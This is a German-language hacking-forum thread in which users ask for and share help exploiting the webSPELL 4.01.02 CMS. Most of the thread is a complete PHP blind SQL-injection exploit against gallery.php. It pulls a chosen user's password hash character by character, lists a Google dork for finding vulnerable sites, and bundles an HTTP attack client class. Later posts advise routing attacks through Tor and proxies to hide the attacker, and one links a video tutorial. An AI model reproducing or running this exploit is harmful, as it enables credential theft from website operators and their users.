Ergebnis 1 bis 8 von 8
  1. #1
    bomdidengdidengdigigi Avatar von hersch24
    Registriert seit
    09.12.2006
    Beiträge
    985

    Standard [S] v.tut / webSPELL 4.01.02 exploit tutorial

    Suche v.tut wie webSPELL 4.01.02 exploitet wird mit nem milw0rm php exploit
    hallo

  2. #2
    Tron Avatar von Rec.127
    Registriert seit
    26.06.2006
    Beiträge
    898

    Standard

    mit dem da ?

    Code:
    <?php
    
    //webSPELL SQL-injection exploit in gallery.php
    $xpl = new phpsploit();
    $xpl->allowredirection(1);
    $xpl->cookiejar(1);
    
    function istrue($xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h){
    	$xpl->get("http://".$host.$path."gallery.php?action=window&galleryID=".$gid."&picID=".$pid."%20AND%20MID((SELECT%20password%20FROM%20".$prefix."user%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")");
    	$response=$xpl->getcontent();
    	$regex='/<html><head><title>webSPELL Diashow: (.+?)<\/title>/';
    	if (preg_match($regex,$response)) {
    		return true;
    	}
    	else return false;
    }
    if($_SERVER['argc']==7 or $_SERVER['argc']==8){
    	$host=$_SERVER['argv'][1];
    	$path=$_SERVER['argv'][2];
    	$prefix=$_SERVER['argv'][3];
    	$gid=$_SERVER['argv'][4];
    	$pid=$_SERVER['argv'][5];
    	$uid=$_SERVER['argv'][6];
    	if($_SERVER['argc']==8){
    		$proxy=$_SERVER['argv'][7];
    		echo "Proxy: $proxy \n";
    		$xpl->proxy($proxy);	
    	}
    	$xpl->agent('Internet Explorer');
    	echo"exploiting...\n";
    	echo"md5-hash: ";
    	for ($i=1;$i<=32;$i++){
    		$found=false;
    		$h=48;
    		while (!$found and $h<=57) {
    			if(istrue($xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h)){
    				$found=true;
    				echo chr($h);
    			}
    			$h++;
    		}
    		if(!$found){
    			$h=97;
    			while (!$found and $h<=122) {
    				if(istrue($xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h)){
    					$found=true;
    					echo chr($h);
    				}
    				$h++;
    			}
    		}
    	}
    }
    else{
    	echo"\n\n";
    	echo"|=======webSPELL v4.01.02 gallery.php SQL Injection========\n";
    	echo"|\n";
    	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path] [prefix] [valid GalleryID] [valid PicID] [valid UserID] ([Proxy-IP:Port])\n|\n";
    	echo"|Example (with Proxy): php ".$_SERVER['argv'][0]." localhost /webspell/ webs_ 1 1 1 192.168.1.1:80\n|\n";
    	echo"|Example (without Proxy): php ".$_SERVER['argv'][0]." localhost /webspell/ webs_ 1 1 1\n|\n";
    	echo"|Notes: This exploit works regardless of the PHP security settings (magic_quotes, register_globals)\n";
    	echo"|       This exploit is only for educational use, use it on your own risk!\n";
    	echo"|       Exploiting scripts without permission of the owner of the webspace is illegal!\n";
    	echo"|       I'm not responsible for any resulting damage\n|\n";
    	echo"|Google Dork: \"this site is using the webspell script (version: 4.01.02)\"\n|\n";
    	echo"|Exploit found by r00t (rootcoding@gmail.com)\n";
    }
    
    /*
    * 
    * Copyright (C) darkfig
    * 
    * This program is free software; you can redistribute it and/or 
    * modify it under the terms of the GNU General Public License 
    * as published by the Free Software Foundation; either version 2 
    * of the License, or (at your option) any later version. 
    * 
    * This program is distributed in the hope that it will be useful, 
    * but WITHOUT ANY WARRANTY; without even the implied warranty of 
    * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
    * GNU General Public License for more details. 
    * 
    * You should have received a copy of the GNU General Public License 
    * along with this program; if not, write to the Free Software 
    * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
    * 
    * TITLE:          PhpSploit Class
    * REQUIREMENTS:   PHP 5 (remove "private", "public" if you have PHP 4)
    * VERSION:        1.1
    * LICENSE:        GNU General Public License
    * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
    * FILENAME:       phpsploitclass.php
    *
    * CONTACT:        gmdarkfig@gmail.com (french / english)
    * GREETZ:         Sparah, Ddx39
    *
    * DESCRIPTION:
    * The phpsploit is a class implementing a web user agent.
    * You can add cookies, headers, use a proxy server with (or without) a
    * basic authentification. It supports the GET and the POST method. It can
    * also be used like a browser with the cookiejar() function (which allow
    * a server to add several cookies for the next requests) and the
    * allowredirection() function (which allow the script to follow all
    * redirections sent by the server). It can return the content (or the
    * headers) of the request. Others useful functions can be used for debugging.
    * A manual is actually in development but to know how to use it, you can
    * read the comments.
    *
    * CHANGELOG:
    * [2006-12-31] (1.1)
    *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
    *  * New: You can now call the getheader() / getcontent() function without parameters
    *
    * [2006-12-30] (1.0)
    *  * First version
    * 
    */
    
    class phpsploit {
    
    	/**
    	* This function is called by the get()/post() functions.
    	* You don't have to call it, this is the main function.
    	*
    	* @return $server_response
    	*/
    	private function sock()
    	{
    		if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
    		else $socket = fsockopen($this->host,$this->port);
    		
    		if(!$socket) die("Error: The host doesn't exist");
    		
    		if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
    		elseif($this->method==="post") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n";
    		else die("Error: Invalid method");
    		
    		if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
    		$this->packet .= "Host: ".$this->host."\r\n";
    		
    		if(!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent."\r\n";
    		if(!empty($this->header)) $this->packet .= $this->header."\r\n";
    		if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
    		
    		$this->packet .= "Connection: Close\r\n";
    		if($this->method==="post")
    		{
    			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
    			$this->packet .= $this->data."\r\n";
    		}
    		$this->packet .= "\r\n";
    		$this->recv = '';
    		
    		fputs($socket,$this->packet);
    		while(!feof($socket)) $this->recv .= fgets($socket);
    		fclose($socket);
    		
    		if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
    		if($this->allowredirection) return $this->allowredirection($this->recv);
    		else return $this->recv;
    	}
    	
    
    	/**
    	* This function allows you to add several cookie in the
    	* request. Several methods are supported:
    	* 
    	* $this->addcookie("name","value");
    	* or
    	* $this->addcookie("name=newvalue");
    	* or
    	* $this->addcookie("othername=overvalue; xx=zz; y=u");
    	* 
    	* @param string $cookiename
    	* @param string $cookievalue
    	* 
    	*/
    	public function addcookie($cookn,$cookv='')
    	{
    		// $this->addcookie("name","value"); work avec replace
    		if(!empty($cookv))
    		{
    			if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
    			if(!empty($this->cookie))
    			{
    				if(preg_match("/$cookn=/",$this->cookie))
    				{
    					$this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);
    				}
    				else
    				{
    					$this->cookie .= " ".$cookn."=".$cookv.";"; // " ".
    				}
    			}
    			else
    			{
    				$this->cookie = $cookn."=".$cookv.";";
    			}
    		}
    		// $this->addcookie("name=value; othername=othervalue");
    		else
    		{
    			if(!empty($this->cookie))
    			{
    				$cookn = preg_replace("/(.*);$/","$1",$cookn);
    				$cookarr = explode(";",str_replace(" ", "",$cookn));
    				for($i=0;$i<count($cookarr);$i++)
    				{
    					preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches);
    					$cookn = $matches[1];
    					$cookv = $matches[2];
    					$this->addcookie($cookn,$cookv);
    				}
    			}
    			else
    			{
    				$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
    				$this->cookie = $cookn;			
    			}
    		}
    	}
    	
    	
    	/**
    	* This function allows you to add several headers in the
    	* request. Several methods are supported:
    	*
    	* $this->addheader("headername","headervalue");
    	* or
    	* $this->addheader("headername: headervalue");
    	*
    	* @param string $headername
    	* @param string $headervalue
    	*/
    	public function addheader($headern,$headervalue='')
    	{
    		// $this->addheader("name","value");
    		if(!empty($headervalue))
    		{
    			if(!empty($this->header))
    			{
    				if(preg_match("/$headern:/",$this->header))
    				{
    					$this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
    				}
    				else
    				{
    					$this->header .= "\r\n".$headern.": ".$headervalue;
    				}
    			}
    			else
    			{
    				$this->header=$headern.": ".$headervalue;
    			}
    		}
    		// $this->addheader("name: value");
    		else 
    		{
    			if(!empty($this->header))
    			{
    				$headarr = explode(": ",$headern);
    				$headern = $headarr[0];
    				$headerv = $headarr[1];
    				$this->addheader($headern,$headerv);
    			}
    			else
    			{
    				$this->header=$headern;
    			}
    		}
    	}
    	
    
    	/**
    	* This function allows you to use an http proxy server.
    	* Several methods are supported:
    	* 
    	* $this->proxy("proxyip","8118");
    	* or
    	* $this->proxy("proxyip:8118")
    	*
    	* @param string $proxyhost
    	* @param integer $proxyport
    	*/
    	public function proxy($proxy,$proxyp='')
    	{
    		// $this->proxy("localhost:8118");
    		if(empty($proxyp))
    		{
    			preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
    			$proxh = $proxarr[1];
    			$proxp = $proxarr[2];
    			$this->proxyhost=$proxh;
    			$this->proxyport=$proxp;
    		}
    		// $this->proxy("localhost",8118);
    		else 
    		{
    			$this->proxyhost=$proxy;
    			$this->proxyport=intval($proxyp);
    		}
    		if($this->proxyport > 65535) die("Error: Invalid port number");
    	}
    	
    
    	/**
    	* This function allows you to use an http proxy server
    	* which requires a basic authentification. Several
    	* methods are supported:
    	* 
    	* $this->proxyauth("darkfig","dapasswd");
    	* or
    	* $this->proxyauth("darkfig:dapasswd");
    	*
    	* @param string $proxyuser
    	* @param string $proxypass
    	*/
    	public function proxyauth($proxyauth,$proxypasse='')
    	{
    		// $this->proxyauth("darkfig:password");
    		if(empty($proxypasse))
    		{
    			preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
    			$proxu = $proxautharr[1];
    			$proxp = $proxautharr[2];
    			$this->proxyuser=$proxu;
    			$this->proxypass=$proxp;
    		}
    		// $this->proxyauth("darkfig","password");
    		else
    		{
    			$this->proxyuser=$proxyauth;
    			$this->proxypass=$proxypasse;
    		}
    	}
    
    	
    	/**
    	* This function allows you to set the "User-Agent" header.
    	* Several methods are possible to do that:
    	* 
    	* $this->agent("Mozilla Firefox");
    	* or
    	* $this->addheader("User-Agent: Mozilla Firefox");
    	* or
    	* $this->addheader("User-Agent","Mozilla Firefox");
    	* 
    	* @param string $useragent
    	*/
    	public function agent($useragent)
    	{
    		$this->agent=$useragent;
    	}
    
    	
    	/**
    	* This function returns the header which will be
    	* in the next request.
    	* 
    	* $this->showheader();
    	*
    	* @return $header
    	*/
    	public function showheader()
    	{
    		return $this->header;
    	}
    
    	
    	/**
    	* This function returns the cookie which will be
    	* in the next request.
    	* 
    	* $this->showcookie();
    	*
    	* @return $storedcookies
    	*/
    	public function showcookie()
    	{
    		return $this->cookie;
    	}
    
    	
    	/**
    	* This function returns the last formed
    	* http request (the http packet).
    	* 
    	* $this->showlastrequest();
    	* 
    	* @return $last_http_request
    	*/
    	public function showlastrequest()
    	{
    		return $this->packet;
    	}
    	
    	
    	/**
    	* This function sends the formed http packet with the
    	* GET method. You can precise the port of the host.
    	* 
    	* $this->get("http://localhost");
    	* $this->get("http://localhost:888/xd/tst.php");
    	* 
    	* @param string $urlwithpath
    	* @return $server_response
    	*/
    	public function get($url)
    	{
    		$this->target($url);
    		$this->method="get";
    		return $this->sock();
    	}
    
    	
    	/**
    	* This function sends the formed http packet with the
    	* POST method. You can precise the port of the host.
    	* 
    	* $this->post("http://localhost/index.php","admin=1&user=dark");
    	*
    	* @param string $urlwithpath
    	* @param string $postdata
    	* @return $server_response
    	*/	
    	public function post($url,$data)
    	{
    		$this->target($url);
    		$this->method="post";
    		$this->data=$data;
    		return $this->sock();
    	}
    
    	
    	/**
    	* This function returns the content of the server response
    	* without the headers.
    	* 
    	* $this->getcontent($this->get("http://localhost/"));
    	* or
    	* $this->getcontent();
    	*
    	* @param string $server_response
    	* @return $onlythecontent
    	*/
    	public function getcontent($code='')
    	{
    		if(empty($code)) $code = $this->recv;
    		$content = explode("\n",$code);
    		$onlycode = '';
    		for($i=1;$i<count($content);$i++)
    		{
    			if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1;
    			if($ok) $onlycode .= $content[$i]."\n";
    		}
    		return $onlycode;
    	}
    
    	
    	/**
    	* This function returns the headers of the server response
    	* without the content.
    	* 
    	* $this->getheader($this->post("http://localhost/x.php","x=1&z=2"));
    	* or
    	* $this->getheader();
    	*
    	* @param string $server_response
    	* @return $onlytheheaders
    	*/
    	public function getheader($code='')
    	{
    		if(empty($code)) $code = $this->recv;
    		$header = explode("\n",$code);
    		$onlyheader = $header[0]."\n";
    		for($i=1;$i<count($header);$i++)
    		{
    			if(!preg_match("/^(\S*):/",$header[$i])) break;
    			$onlyheader .= $header[$i]."\n";
    		}
    		return $onlyheader;
    	}
    
    	
    	/**
    	* This function is called by the cookiejar() function.
    	* It adds the value of the "Set-Cookie" header in the "Cookie"
    	* header for the next request. You don't have to call it.
    	* 
    	* @param string $server_response
    	*/
    	private function getcookie($code)
    	{
    		$carr = explode("\n",str_replace("\r\n","\n",$code));
    		for($z=0;$z<count($carr);$z++)
    		{
    			if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr))
    			{
    				$cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1]));
    			}
    		}
    
    		for($i=0;$i<count($cookie);$i++)
    		{
    			preg_match("/(\S*)=(\S*);/",$cookie[$i],$matches);
    			$cookn = $matches[1];
    			$cookv = $matches[2];
    			$this->addcookie($cookn,$cookv);
    		}
    	}
    
    	
    	/**
    	* This function is called by the get()/post() functions.
    	* You don't have to call it.
    	*
    	* @param string $urltarg
    	*/
    	private function target($urltarg)
    	{
    		if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
    		$this->url=$urltarg;
    		
    		$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
    		$this->host=$array[0];
    
    		preg_match("/:(\d+)\//",$urltarg,$matches);
    		$this->port=empty($matches[1]) ? 80 : $matches[1];
    		
    		$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
    		preg_match("/\/(.*)\//",$temp,$matches);
    		$this->path=str_replace("//","/","/".$matches[1]."/");
    		
    		if($this->port > 65535) die("Error: Invalid port number");
    	}
    	
    	
    	/**
    	* If you call this function, the script will
    	* extract all "Set-Cookie" headers values
    	* and it will automatically add them into the "Cookie" header
    	* for all next requests.
    	*
    	* $this->cookiejar(1); // enabled
    	* $this->cookiejar(0); // disabled
    	* 
    	*/
    	public function cookiejar($code)
    	{
    		if($code===0) $this->cookiejar='';
    		if($code===1) $this->cookiejar=1;
    		else
    		{
    			$this->getcookie($code);
    		}
    	}
    
    
    	/**
    	* If you call this function, the script will
    	* follow all redirections sent by the server.
    	* 
    	* $this->allowredirection(1); // enabled
    	* $this->allowredirection(0); // disabled
    	* 
    	* @return $this->get($locationresponse)
    	*/
    	public function allowredirection($code)
    	{
    		if($code===0) $this->allowredirection='';
    		if($code===1) $this->allowredirection=1;
    		else
    		{
    			if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
    			{
    				$location = str_replace(chr(13),'',$codearr[2]);
    				if(!eregi("://",$location))
    				{
    					return $this->get("http://".$this->host.$this->path.$location);
    				}
    				else
    				{
    					return $this->get($location);
    				}
    			}
    			else
    			{
    				return $code;
    			}
    		}
    	}
    	
    	
    	/**
    	* This function allows you to reset some parameters:
    	* 
    	* $this->reset(header); // headers cleaned
    	* $this->reset(cookie); // cookies cleaned
    	* $this->reset();       // clean all parameters
    	*
    	* @param string $func
    	*/
    	public function reset($func='')
    	{
    		switch($func)
    		{
    		case "header":
    			$this->header='';
    			break;
    			
    		case "cookie":
    			$this->cookie='';
    			break;
    			
    		default:
    			$this->cookiejar='';
    			$this->header='';
    			$this->cookie='';
    			$this->allowredirection=''; 
    			$this->agent='';
    			break;
    		}
    	}
    }
    
    ?>

    wenn ja

    1. weisst du wie man einen php exploit ausführt
    2. weisst du ob deine seite vulnerable ist

    mfg
    "Wer zu viel riskiert, läuft Gefahr, alles zu verlieren. Wer wiederum zu wenig vom Leben erwartet, bekommt am Ende vielleicht garnichts."
    - Aussage von Tommy Angelo während der Ennio-Salieri-Verhandlung, 1938

    -
    If you're a movie downloader, click to learn something about quality
    - Trades/presents/any other reviews 'bout me click here to join the blackmarket profiles

  3. #3
    God of Weeeeeed!
    Registriert seit
    11.02.2007
    Beiträge
    229

    Standard

    Ich werde dir heute eins machen!!!!!


    Ich habe schon n Tut gemacht, dass zeigt wie man PERL exploits ausführt (binn es am hochladen) aber, das is wirklich für Anfänger!!

    Aso, das Tut geht 19 Minuten, und ich habe alles genaustens erklärt (nach meinem Wissen)


    Ok, ich werde es heute mal machen :lol:

  4. #4
    Überlebender ... !
    Registriert seit
    06.01.2007
    Beiträge
    287

    Standard

    ja gut AASF, und zeig mal bitte auch wie du das mitn proxy machst, also das explo.

    weil das tut was du schon gemacht hast , hast du ohne proxy gemacht ^^
    das einloggen auf der page sowie das exploiten.

    zeig das mal bitte, würd ich ma gerne wissen

    mfg fake
    ::


  5. #5
    God of Weeeeeed!
    Registriert seit
    11.02.2007
    Beiträge
    229

    Standard

    Ok...


    kann ich machen, wenn ich einen guten Proxy gefunden habe
    "Wo es Freiheit gibt, ist die Gleichheit die Leidenschaft der Massen. Wo es Gleichheit gibt, ist die Freiheit die Leidenschaft einer kleinen Minderheit. Gleichheit ohne Freiheit ergibt eine stabilere soziale Ordnung als Freiheit ohne Gleichheit." Eric Hoffer

  6. #6
    Überlebender ... !
    Registriert seit
    06.01.2007
    Beiträge
    287

    Standard

    Zitat Zitat von AASF
    Ok...


    kann ich machen, wenn ich einen guten Proxy gefunden habe
    nihm das TOR paket ( privoxy + TOR + vidalia )

    und dan halt noch den tor button für mozilla und dan ab die post

    und finden tust du es hier

    Code:
    tor.eff.org

    aber was ich wissen möchte ist, wie man ein proxy server beim exploiten einbinded, über das CMD fenster halt. wen man den von dort aufruft.
    das muss ja auch ihrgend wie geschützt werden....

    mfg. Fake
    ::


  7. #7
    God of Weeeeeed!
    Registriert seit
    11.02.2007
    Beiträge
    229

    Standard

    Genau das meine ich ^^

    Ich benutze eigentlich auch TOR, aber naja, ich habe keinen guten Proxy, aber ich zeige euch, wie man es auführen würde
    "Wo es Freiheit gibt, ist die Gleichheit die Leidenschaft der Massen. Wo es Gleichheit gibt, ist die Freiheit die Leidenschaft einer kleinen Minderheit. Gleichheit ohne Freiheit ergibt eine stabilere soziale Ordnung als Freiheit ohne Gleichheit." Eric Hoffer

  8. #8
    God of Weeeeeed!
    Registriert seit
    11.02.2007
    Beiträge
    229

    Standard So, tutorial steht...

    http://rapidshare.com/files/33008233...with_Proxy.rar


    Es geht dieses mal nur 13 Minuten

    Ich weiss, es is immernoch zu lang, aber naja, shit happens :roll:


    PW ist wieder keins drauf
    "Wo es Freiheit gibt, ist die Gleichheit die Leidenschaft der Massen. Wo es Gleichheit gibt, ist die Freiheit die Leidenschaft einer kleinen Minderheit. Gleichheit ohne Freiheit ergibt eine stabilere soziale Ordnung als Freiheit ohne Gleichheit." Eric Hoffer

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •